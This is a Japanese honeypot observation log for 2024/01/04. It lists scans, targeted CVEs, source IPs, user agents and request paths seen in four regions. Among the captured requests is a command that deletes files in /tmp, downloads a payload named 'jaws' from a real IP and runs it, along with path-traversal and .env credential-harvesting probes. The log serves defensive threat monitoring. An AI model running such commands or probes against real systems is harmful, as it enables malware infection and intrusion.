2024/01/04 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/01/04分です。

特徴

共通

CensysInspectによるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
phpMyAdminへのスキャン行為

を確認しました。

Location:US

GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Odinによるスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  157.90.250.90/jaws;
sh /tmp/jaws

Location:UK

GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
configファイルへのスキャン行為

を確認しました。

Location:SG

GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Nmap Scripting Engineによるスキャン行為
Odinによるスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為
51.15.117.46に関する不正通信

を確認しました。

他

アクセス数推移

JP：総アクセス数：147 (前日比：44)
US：総アクセス数：131 (前日比：37)
UK：総アクセス数：118 (前日比：39)
SG：総アクセス数：127 (前日比：-114)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.56.247.120	Germany
12	3.85.24.248	United States
1	34.228.24.182	United States
1	45.56.108.128	United States
1	45.79.168.172	United States
45	47.149.31.206	United States
1	54.173.133.244	United States
1	64.62.197.184	United States
15	101.32.192.203	Singapore
1	104.192.0.61	United States
1	111.224.249.168	China
5	135.125.217.54	France
7	135.125.246.110	France
4	135.125.246.189	France
1	156.146.35.170	United Kingdom
13	157.245.54.38	United States
1	167.248.133.187	United States
1	172.104.11.4	United States
2	179.60.147.13	Belize
1	185.161.248.148	United Kingdom
19	185.180.143.141	Portugal
1	185.254.196.173	Ukraine
4	185.254.196.186	Ukraine
1	192.241.207.47	United States
1	192.241.216.30	United States
2	198.235.24.176	United States
2	205.210.31.28	United States
2	205.210.31.132	United States

UserAgent一覧

件数	UserAgent
60	`-`
1	`Go-http-client/1.1`
1	`HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0`
1	`Mozilla/5.0 (Linux; Android 9; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36`
15	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
18	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.88`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; Yahoo! Slurp China; http[:]//misc[.]yahoo[.]com[.]cn/help.html)`
2	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14`
1	`WebCopier v4.6`
1	`curl/8.1.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`*1`
3		`\x03`
11		`\x16\x03\x01`
23	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/Telerik.Web.UI.WebResource.axd?type=rau`	HTTP/1.1
2	GET	`/admin/.git/config`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/api/.git/config`	HTTP/1.1
1	GET	`/api/session/properties`	HTTP/1.1
1	GET	`/app/.git/config`	HTTP/1.1
1	GET	`/assets/.git/config`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
1	GET	`/core/.git/config`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
1	GET	`/favicon-32x32.png`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/includes/.git/config`	HTTP/1.1
1	GET	`/index.jsp`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/lib/.git/config`	HTTP/1.1
1	GET	`/modules/.git/config`	HTTP/1.1
1	GET	`/node_modules/.git/config`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/plugins/.git/config`	HTTP/1.1
1	GET	`/showLogin.cc`	HTTP/1.1
1	GET	`/sitecore/shell/sitecore.version.xml`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/src/.git/config`	HTTP/1.1
1	GET	`/static/historypage.js`	HTTP/1.1
1	GET	`/sugar_version.json`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/vendor/.git/config`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
1	GET	`http[:]//18[.]179[.]20[.]5:80/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/SQL/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysqladmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/php-myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/php/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/sqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/sqlweb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/webdb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/websql/scripts/setup.php`	HTTP/1.0
15	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
8	35.77.92.99	United States
2	43.135.123.64	Singapore
1	45.79.128.205	United States
2	45.79.181.104	United States
1	45.79.181.179	United States
2	45.79.181.223	United States
1	45.79.181.251	United States
2	45.95.147.251	Netherlands
1	45.117.171.236	Vietnam
1	45.142.182.92	Germany
1	52.81.61.158	China
3	54.36.115.221	France
1	54.37.79.75	France
16	57.129.23.166	France
1	62.233.50.179	Russia
1	64.62.197.10	United States
1	65.49.1.97	United States
1	65.49.1.103	United States
1	65.49.1.106	United States
2	78.153.140.219	Russia
2	83.97.73.245	Germany
16	90.151.171.106	Russia
2	90.151.171.108	Russia
1	91.191.209.202	Bulgaria
2	91.191.209.206	Bulgaria
1	91.240.118.75	Russia
7	95.214.235.169	Ukraine
1	103.187.190.6	private ip address
3	103.187.190.67	private ip address
1	103.187.190.71	private ip address
2	103.187.190.75	private ip address
1	103.187.190.130	private ip address
1	103.187.190.139	private ip address
4	103.187.191.220	private ip address
1	137.184.58.150	United States
1	139.59.101.104	Singapore
13	142.93.217.131	United States
2	162.142.125.226	United States
1	162.243.141.21	United States
2	165.227.99.72	United States
2	167.71.217.188	United States
2	167.248.133.123	United States
1	172.104.11.34	United States
1	172.105.128.11	United States
1	172.105.128.13	United States
2	188.166.214.180	United States
2	188.166.231.170	United States
2	192.155.90.118	United States
1	192.241.207.87	United States
2	205.210.31.164	United States
2	205.210.31.174	United States

UserAgent一覧

件数	UserAgent
39	`-`
7	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 6.0; Le X620 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G965U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.0 Chrome/67.0.3396.87 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.102 Safari/537.36 Vivaldi/2.0.1309.3`
9	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from) Z73802194750Q1`
9	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
1	`Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
28	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 (compatible; Odin; https[:]//docs[.]getodin[.]com/)`
1	`Mozilla/5.0 zgrab/0.x`
5	`Mozilla/5.0`
1	`Opera/7.51 (Windows NT 5.1; U) [en]`
1	`curl/8.1.2`
1	`libwww-perl/5.820`
1	`nook browser/1.0`
1	`xxx`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
5		`\x03`
1		`\x16\x03\x01\x01H\x01`
3		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x01`	\x01
25		`\x16\x03\x01`
3	CONNECT	`check.best-proxies[.]ru:443`	HTTP/1.1
1	CONNECT	`eth0[.]me:443`	HTTP/1.1
1	CONNECT	`fingerprints[.]bablosoft[.]com:443`	HTTP/1.1
3	CONNECT	`ip[.]bablosoft[.]com:443`	HTTP/1.1
1	CONNECT	`res[.]wx[.]qq[.]com:443`	HTTP/1.1
1	CONNECT	`v4[.]ident[.]me:443`	HTTP/1.1
1	GET	`/.DS_Store`	HTTP/1.1
28	GET	`/.env`	HTTP/1.1
1	GET	`//favicon[.]ico`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/.git/config`	HTTP/1.1
1	GET	`/api/.git/config`	HTTP/1.1
1	GET	`/blogs/.git/config`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
4	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/core/.git/config`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/includes/.git/config`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/modules/.git/config`	HTTP/1.1
1	GET	`/nmaplowercheck1704313511`	HTTP/1.1
1	GET	`/node_modules/.git/config`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/query?q=SHOW+DIAGNOSTICS`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws`
1	GET	`/solr/admin/cores?action=STATUS&wt=json`	HTTP/1.1
1	GET	`/solr/admin/info/system`	HTTP/1.1
1	GET	`/src/.git/config`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/v2/_catalog`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-content/plugins/media-library-assistant/readme.txt`	HTTP/1.1
3	GET	`http[:]//check[.]best-proxies.ru/ip.php?Z73802194750Q1`	HTTP/1.1
1	GET	`http[:]//eth0[.]me?Z73802194750Q1`	HTTP/1.1
1	GET	`http[:]//fingerprints[.]bablosoft[.]com/ip?Z73802194750Q1`	HTTP/1.1
3	GET	`http[:]//ip[.]bablosoft[.]com/?Z73802194750Q1`	HTTP/1.1
1	GET	`http[:]//v4[.]ident[.]me?Z73802194750Q1`	HTTP/1.1
1	POST	`/api/v0/id`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	31.220.88.155	Spain
6	35.77.92.99	United States
1	45.33.80.243	United States
1	45.79.128.205	United States
1	45.79.172.21	United States
2	45.79.181.223	United States
2	45.95.147.251	Netherlands
1	45.142.182.92	Germany
8	54.36.115.221	France
3	57.129.23.166	France
1	64.62.197.149	United States
3	74.82.47.4	United States
1	91.92.243.232	Bulgaria
1	91.240.118.75	Russia
8	95.214.235.169	Ukraine
1	107.170.229.49	United States
1	107.170.234.43	United States
1	117.184.26.242	China
1	139.59.101.104	Singapore
13	139.59.250.174	Singapore
33	149.18.84.40	United States
1	154.6.147.208	United States
2	159.223.79.134	United States
2	162.142.125.222	United States
2	167.94.138.51	United States
2	167.94.138.124	United States
2	167.94.146.51	United States
1	172.104.11.46	United States
2	172.104.11.51	United States
1	174.138.51.129	United States
2	179.60.147.13	Belize
2	183.136.225.42	China
1	185.170.144.3	Estonia
2	192.155.90.118	United States
2	205.210.31.105	United States
2	205.210.31.130	United States
1	222.186.48.201	China

UserAgent一覧

件数	UserAgent
30	`-`
1	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 8.1.0; LM-X210CMR) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.83`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0`
33	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
19	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
4	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1`
1	`Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0`
2	`Mozilla/5.0 zgrab/0.x`
4	`Mozilla/5.0`
1	`curl/8.1.2`
1	`xfa1`

リクエスト内容一覧

件数	Method	Request	Protocol
4		`\x03`
1		`\x16\x03\x01\x01\xc0\x01`
1		`\x16\x03\x01\x03_\x01`
19		`\x16\x03\x01`
1	CONNECT	`res[.]wx[.]qq[.]com:443`	HTTP/1.1
1	GET	`../../proc/ HTTP`
21	GET	`/.env`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/132.145.66.34/.env`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/admin/.git/config`	HTTP/1.1
1	GET	`/admin/config.php`	HTTP/1.0
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/api/.git/config`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/app/config/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/audio/.env`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/base/.env`	HTTP/1.1
1	GET	`/blog/.env`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
3	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/.env`	HTTP/1.1
1	GET	`/conf/.env`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/crm/.env`	HTTP/1.1
1	GET	`/database/.env`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/includes/.git/config`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/library/.env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/new/.env`	HTTP/1.1
1	GET	`/newsite/.env`	HTTP/1.1
1	GET	`/node_modules/.git/config`	HTTP/1.1
1	GET	`/old/.env`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/plugins/.git/config`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sites/all/libraries/mailchimp/.env`	HTTP/1.1
1	GET	`/src/.env`	HTTP/1.1
1	GET	`/src/.git/config`	HTTP/1.1
1	GET	`/storage/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/vendor/.env`	HTTP/1.1
1	GET	`/vendor/laravel/.env`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-admin/.env`	HTTP/1.1
1	GET	`/wp-content/.env`	HTTP/1.1
1	GET	`/www/.env`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
4	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.196.102.74	France
1	36.99.136.136	China
1	38.6.227.223	United States
1	43.163.9.31	China
1	45.56.108.128	United States
1	45.79.181.251	United States
2	45.95.147.251	Netherlands
1	45.142.182.92	Germany
1	45.227.254.49	Belize
3	51.15.117.46	France
5	54.36.115.221	France
20	57.129.23.166	France
1	61.219.11.155	Taiwan
3	65.49.20.66	United States
1	74.82.47.5	United States
2	78.153.140.219	Russia
2	78.153.140.221	Russia
2	83.97.73.245	Germany
2	91.92.241.61	Bulgaria
2	91.191.209.206	Bulgaria
1	91.240.118.73	Russia
8	95.214.235.169	Ukraine
1	103.187.190.8	private ip address
2	103.187.190.66	private ip address
1	103.187.190.74	private ip address
3	103.187.190.132	private ip address
2	103.187.190.136	private ip address
4	103.187.190.190	private ip address
1	154.61.75.158	United States
1	158.247.206.133	Japan
2	165.154.224.182	Singapore
2	165.227.99.72	United States
2	167.94.138.126	United States
2	167.94.145.53	United States
13	170.64.157.252	United States
2	172.104.11.34	United States
1	172.104.11.46	United States
4	172.104.11.51	United States
1	172.105.128.11	United States
9	185.140.210.153	France
4	185.142.236.40	Seychelles
1	191.96.227.231	Chile
1	192.155.90.118	United States
1	192.241.202.77	United States
1	198.199.111.207	United States
2	198.235.24.18	United States
2	205.210.31.174	United States

UserAgent一覧

件数	UserAgent
44	`-`
7	`Go-http-client/1.1`
2	`Mozilla 5/0`
1	`Mozilla/5.0 (Linux; Android 11; Pixel 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36`
